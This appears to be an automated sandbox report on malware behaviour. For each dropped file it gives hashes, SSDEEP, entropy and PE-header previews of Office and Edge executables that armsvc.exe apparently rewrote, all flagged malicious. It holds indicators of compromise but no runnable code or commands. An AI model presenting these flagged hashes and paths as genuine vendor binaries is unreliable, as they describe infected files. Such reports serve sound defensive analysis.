Category:	dropped
Size (bytes):	1405440
Entropy (8bit):	4.922389017583568
Encrypted:	false
SSDEEP:	24576:ri7le3roA1GJ0eeQ2yPyzc+E7xonyVGc/dT5N:mloroAQJLeQVPyzc+E7xQ2l
MD5:	8EB568E9C01C38505C12D06331939E62
SHA1:	50C5955EEC1F5BFC16883F5D8772A2875563F9AF
SHA-256:	CBE86F16627DCBA45E26EAE55E6640E752AA0E9C7C9F922750A30A355BEF7668
SHA-512:	5D89BDE8216CD669D6E466015D736B569206FB8F46D309609DAAF24499B133A0D7D71B70D9C50C8A9C3EABCF9B9EFF8E4DB930493A1B811AFA82D66658569C52
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..................................k..................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc..............................@...........................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1375744
Entropy (8bit):	4.95026958866601
Encrypted:	false
SSDEEP:	24576:TNfQNBGJ0eeQ2yPyzc+E7xonyVGc/dT5N:pGsJLeQVPyzc+E7xQ2l
MD5:	98A145D104293A7812D0086395DBDCD7
SHA1:	591B3262AD2AB3E86DAF8A84931EB38B6321C375
SHA-256:	DD8D74CBA6533E1939BBD706502F9DA0FBC918139B24586C12AD398BB7F5E373
SHA-512:	F0F025D4AEE0EA08966A30FB9BB08CB19D977F7F93FE5E73C1CD226379E8A979DAB10A9E59D25093D3804CD7B62F40701CD43226F2A868AAE2B8C9FF9E87F884
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................\|.......\|.......\|.......\|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@..........................0......Z.......................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc.......@......................@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1394176
Entropy (8bit):	4.970379687280527
Encrypted:	false
SSDEEP:	12288:ANmt0LDILi2KkGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:vLisGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	F715656B652B95843AD9E9B265D6C318
SHA1:	97621C2511CF3B2AD7342030214768E359D81601
SHA-256:	C4E7E52B7A2515ECB93439C38426689D406942AEEB3ABCD847663B27D54AEE50
SHA-512:	2C7DE89D7DB710EC9B60A33CE10F4933645524743A74E7D5873CC7AE874E29BA73EAE4332ABB015BF9E88D2952BC55382AC2B09A9BA63743FBC487A46F2E8CD8
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@..........................p......D............ ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.....................@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1394176
Entropy (8bit):	4.970373556229406
Encrypted:	false
SSDEEP:	12288:BNmt0LDILi2KkGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:ULisGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	C815F04CC38D91BC9355DFABA786C006
SHA1:	03CF65D60100FE06136B839476938CBCEC80DBC8
SHA-256:	75C89976929D050A0A84012D1895E190D3A01122D92A9BBAB7BD22A192DAA45C
SHA-512:	5A27AA2CABE5D55329C0C4B18E012BB1E0027FFE891170FB7CE57E17AF7A429B7D02F8BEFF62D7EA0B9DCA856C51C443A4C86C0F215AF8A23D1BA89DC38F5890
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@..........................p.......8........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.....................@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1449984
Entropy (8bit):	4.920209036964111
Encrypted:	false
SSDEEP:	12288:ajuozXMGNUbTZGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:yfgGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	F31BAD0784BE18E94050B5506A49CBCC
SHA1:	6DDBA67C230BF04C999D3E900670D5DCE4A7DC8C
SHA-256:	F6C3B049FB42656790E6275A234B00457AB7895EF1DAE597C409B819DCA0B64E
SHA-512:	0EC3DB2E0D483AC7E547310B60DE9232B4EEBDBACFCC64A44D25CF797BA82ED57ABF67E5BB3D45150F8F52780FFEA2327C8BF02130F33983548FE55EB0BF0539
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@.............................0 .....eW.... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc.......0....... ..............@...........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1602560
Entropy (8bit):	5.2786582921335965
Encrypted:	false
SSDEEP:	24576:abUO42K/EKGJ0eeQ2yPyzc+E7xonyVGc/dT5N:aRdJLeQVPyzc+E7xQ2l
MD5:	70B1421234148217B0EC5F17D642B944
SHA1:	C77F9F8E2190366F78D1B398833DE7DF5D9479FD
SHA-256:	E102C11EC346BB55B77B95EA39D07DE1644F7B7A1334ED8FC46A5AB4BA0D558F
SHA-512:	82C69D63A24296ADD16D805194A22CFF93CA8BEF1CFB09DF5FE141A3CA7DB16CC5EFACFD93834DE657BAE50C2510FD65E2F068E9097D6A287FA9B129768C6AFD
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...\|...............@....@..........................."......I........... ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...............d..............@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	52712960
Entropy (8bit):	7.961756483175891
Encrypted:	false
SSDEEP:	1572864:GKjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe0:BicZmsR3Lo/cnLe0
MD5:	7E57872557DDC81C4FC76CAC18B583CB
SHA1:	84285A9F21EA9612DAB7C160DDC7A4E8BD1DF5BE
SHA-256:	62CB62D89747CDFBC22EA4904A7473BB53C640238C9CE184C1D2F75EDE1682FB
SHA-512:	7D9099782ED5DF3EE92692442CE47EB76D4BABA1216B745F8E4BC7770A17C70011BD0D7592085168CDC154D2089F8B88EDA19C1B29A8A5CBF4C6F853F386285A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.....;.$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1763840
Entropy (8bit):	5.364966878772687
Encrypted:	false
SSDEEP:	24576:Kd8DMeflpnIOvYURGJ0eeQ2yPyzc+E7xonyVGc/dT5N:KCDD9pnIO6JLeQVPyzc+E7xQ2l
MD5:	F0F45EA558E66F1C19925571DF891FC0
SHA1:	B6AC7F03CE38764B8B13F045494384DBE420BEB5
SHA-256:	D7DA24CEE9B658A494A01C2AD11F1A07B1ADB488255BFA82F2229E02D5E4B700
SHA-512:	F6C81CE410DFC860EAB416E8380CCA37F31D9F421AD2C3D27C951DD6F87EB6C783EEAF1C133CB799A1F98DE1DEB4869940314F15E2EC44DECA984FCED4BEACB8
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@..............................%.....#[.... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc..............................@...................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4364800
Entropy (8bit):	6.745658050368103
Encrypted:	false
SSDEEP:	49152:qB1sstqMHiq8kBfK9a+cOVE/TqEpEepdkRqqUu9wg6KFYso8l8E9JLeQVPyzc+EB:EHzorVmr2gkRpdJYolX1vcbE7xQ2l
MD5:	71C24BF29F4357FBA025E115DC3C0A81
SHA1:	BC65C556AAFB0DD6EC0F411BDF288D503436E4EA
SHA-256:	B2FE6BEC5EF123553BF2130417FD6C17F56783385CF532D9B1792F8C13A4441E
SHA-512:	54D312E3B1117E9B8EC72B24049576AAD8B3D74513F469DE35A692D1F48021A4404953F6257CFEDB42D682FCDFDC70D4DBC0DE4C60875B1EC992C1AB8DA650B7
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD.....3.B... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1345024
Entropy (8bit):	4.81067273398373
Encrypted:	false
SSDEEP:	24576:NEyTrGJ0eeQ2yPyzc+E7xonyVGc/dT5N:6yOJLeQVPyzc+E7xQ2l
MD5:	7E51966F9182D8088DC7BBBD52D7E5EC
SHA1:	F22EB10D4CDAC558B0DB4422A79EDBE264DE511A
SHA-256:	0651E737746B312DC540C7E605BC3693EC67974A96F8EF89F045785B3E3FACBF
SHA-512:	7E8DA96572357392F24345D15D82BDD692C0B34A2EB3069850B5F9384C0F858A3DEF1AAF074B64222CA96500D1C88F77D6C95BC2870864C0DE4CBF09ED076C3D
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@....................................{..... ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc..............................@...........................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2354176
Entropy (8bit):	7.044729417160485
Encrypted:	false
SSDEEP:	49152:qhDdVrQ95RW0YQHyWQXE/09Val0G7JLeQVPyzc+E7xQ2l:qhHYWmHyWKQ1vcbE7xQ2l
MD5:	422656A98AE1E4FC0F42676F7870266C
SHA1:	E63ECD0AAF7DE83630F427451C67A15467FDD7BA
SHA-256:	6A3A560D41D6754E2687A92F59167DCC8B95F2C7741966A3779ABDF46C68EA07
SHA-512:	59714B4E0688D9D2E71DA6912867D7DD1E36D85C39C52F953A27E477A0A7FAF4B286C7772E5238C633A00CEFF35B00F1363D1E0C4763D6D1F8307F5E76743ED8
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%.......$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1825280
Entropy (8bit):	7.151808192898985
Encrypted:	false
SSDEEP:	24576:670E0ZCQZMib6Rrt9RoctGfmdd6GJ0eeQ2yPyzc+E7xonyVGc/dT5N:+0EzQS7RPRoc1JJLeQVPyzc+E7xQ2l
MD5:	7230CD0572C3917E78C9A8FEC2B90510
SHA1:	DB70A954BA08A5C61212A5A0E9515298CDC0C5FE
SHA-256:	3A646B7FABF73A17B5B76CC2140DB08A536E277587482B10A209663580259B83
SHA-512:	9354B005186BEC12F524F0CDF1CEB2F23BC3C26A5B239DF17BE8C2AF6962EA91B206B9E55212664278F158A4BF65C7A2EA48BE6834E24F50345FB30F5222329A
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0.......>.... ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1847808
Entropy (8bit):	7.138841868700977
Encrypted:	false
SSDEEP:	49152:/D2VmAygwIb8boQdJLeQVPyzc+E7xQ2l:r2VBwIbq1vcbE7xQ2l
MD5:	2E25202C5BF6484F1561AF29BEDD523A
SHA1:	75F090EB688F842FBBD3CFA5E3B199A5E3DA4E75
SHA-256:	1D29EE60FAFD8F2A10600923EDCC6EC2AB21FF8653B435603EB9DE0643D47A4F
SHA-512:	8E47A390756F96B43FCA4D4E5D0258A1F40DD59CA654B9C83C87C6D985C6CFC212BF357E94925AFAF130CBDFE20358751BA4549A870146171A0CE4C11F476CA0
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..\|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2853376
Entropy (8bit):	6.946676538956616
Encrypted:	false
SSDEEP:	49152:CfD3zO9ZhBGlohzM3HRNr00FJLeQVPyzc+E7xQ2l:4DaalSzM00F1vcbE7xQ2l
MD5:	27E464912EB86B08B7ACE72C4F464017
SHA1:	F2FA9CE044081A26FA068D677E634FA4DDD40FB0
SHA-256:	1AFF739EE8C95C7BED89CE57092B91F2911B2CF062135EC57BDF7CDB7FBE3C5E
SHA-512:	DC76FAFCE22FB5C21324E02464C596E7568187C2869F09DD8D89404A13D432E670430D569DBFC9C7522DC2E338D1EEFA82595D4C3B546667446FFFE7EE315A85
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-......S,... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4320256
Entropy (8bit):	6.821686656742896
Encrypted:	false
SSDEEP:	49152:TTaRe7mkn5KLvD5qGVC008/pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhSJLeQVPyS:SI72Lvkr4pbxJRoIMt1vcbE7xQ2l
MD5:	57BAD3F568FD1DE2259293E14938E069
SHA1:	BC78FF10F51CF5A37AEBEF8AC7C7E532305F06DE
SHA-256:	D01A40B7F7796F79CFB01D0B3F5799433CC9F3B5531F9733E4F5BD6FD9FB046F
SHA-512:	5DC1E223372FA9226D6A3ECDA4E296358E11E4D94EDB001EE9EC5E1AF957A6F08E1006A1B1422ACCB9FF62ED6EB4EADF5F08C0F3F02C21B9023369BFB1FD7F4E
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C.......B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2062336
Entropy (8bit):	7.0912194765179
Encrypted:	false
SSDEEP:	49152:jWnm5iAMkjmQWkV9JLeQVPyzc+E7xQ2l:4OMkV1vcbE7xQ2l
MD5:	BF8F8B75E4224C7C305EB995DDCAF31A
SHA1:	44C48FD06AFD17858C81CEF51D2123C81DEACBEE
SHA-256:	3A919AA69F223CB4250543D87B9FAFD5AD89FBD91006E6A695795530727CF50A
SHA-512:	77CE7739AB0FD3D7D3FBAF481C77DEFC306890C17466C146A233C8B36078D934E6F575B090B2897342D5CEC79DD5F071E1489DE8EE39C5311BE1739BE4BBAF77
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. .....Z..... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............\|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1801216
Entropy (8bit):	7.159635691986473
Encrypted:	false
SSDEEP:	24576:TwNHwoYhua6MZERO4qbBJTY6mY1uIgIGJ0eeQ2yPyzc+E7xonyVGc/dT5N:TwNPdNO7BJTfmEUJLeQVPyzc+E7xQ2l
MD5:	B69ABCE7E140C2D5B4456DB97C6669DB
SHA1:	62F9EDD78DE6415C0F0DDB3790083A12E74E9071
SHA-256:	54871383B19EA3250E80EAA19E47B0EAE0BB15BFE310A58551C1F5D4FABFB982
SHA-512:	EDA1EB7F654CAB53197F176A44C57B643B582E0BB78C599A945C3C14CD70650DC8AF62436F08626B4C95DD30CA91AE547EA74A0352FED4D5C0756AF9FFF3A9ED
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".........r......P..........@......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(......................... ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............\|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1847808
Entropy (8bit):	7.13884241607224
Encrypted:	false
SSDEEP:	49152:1D2VmAygwIb8boQdJLeQVPyzc+E7xQ2l:V2VBwIbq1vcbE7xQ2l
MD5:	9A22553BEA1548F6F47F34BEB9C7053D
SHA1:	11C3D9EF995AADC66BC7D2B4B020910B1FF17596
SHA-256:	D684D04AC1D52CBE89E68BC13636FBE715268F1E1A65152E49ED07681F578824
SHA-512:	F6D2ADD8545706E7FED202F99E9CAE254C7BA370A7D400932D635F4B3A654140CC2A3F6D2EF7B95DED6766BA7F705A36511188E37F76B02FBA2271125FC0D27E
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..\|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1801216
Entropy (8bit):	7.159637625935675
Encrypted:	false
SSDEEP:	24576:ywNHwoYhua6MZERO4qbBJTY6mY1uIgIGJ0eeQ2yPyzc+E7xonyVGc/dT5N:ywNPdNO7BJTfmEUJLeQVPyzc+E7xQ2l
MD5:	94A0763BC754301ED2F3BD160E945184
SHA1:	42B377C29011471BA62232F912982E06DCE2EA14
SHA-256:	72DFB2739C56BD13BC9EDAB87CBEECBA698689912C02C1CACF12BC2D03D502B5
SHA-512:	76B1637D1E7E6FA2658C30DFD81CAC2547FA2F6F06167A95F4B3EB6C893CC2029C12A1F71CF842C3F9423440CE5A7443DD3C9E3388D7B7182AC86FB1C5B7502E
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".........r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(......................... ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............\|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1432064
Entropy (8bit):	4.8248730273687865
Encrypted:	false
SSDEEP:	24576:m6lbht6BHtGJ0eeQ2yPyzc+E7xonyVGc/dT5N:plNtqHYJLeQVPyzc+E7xQ2l
MD5:	D856BA341030FBEDFA0D1935CA71D65D
SHA1:	6C325C78851473B4FD6BB57388E20D35C060102A
SHA-256:	BCCE499B59B4BBEF9154D8F601B14D1746F50280990DA421FF9F20FB4855F23B
SHA-512:	8B3CCC4EC48350147BC95743E0C5209428892B19F18A7118B1EB629A2D04888BFD4385BADA1AAD682E7F21F493CB19A1E7C0D87637944EDA2143548053E1C7FD
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...c..?....c..+c..Xc......)c.....c..+c..\|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@.......................... .............................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc.......0......................@...........................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1327616
Entropy (8bit):	4.7970697028670894
Encrypted:	false
SSDEEP:	24576:zIxkTBVZGJ0eeQ2yPyzc+E7xonyVGc/dT5N:Mxk1VUJLeQVPyzc+E7xQ2l
MD5:	235B915E370B137A9DEC656B59B5A701
SHA1:	0161EFA6842EBE6AEBC9D93C6C8EA121AA3FC8A8
SHA-256:	211F497A1B8F292092593227C47D76D41B1A1FFF639CB1B45E0F350CC3CBD09A
SHA-512:	AE9A9DE9ADD1EA5619A198951E4F941F229B1F9784EC347AF8BC9D4022C6184D397EFF24FFE7DC6735BFC5A0721E0FEFE84D40A4DD375CE445A705A06E484F86
Malicious:	true
Reputation:	unknown
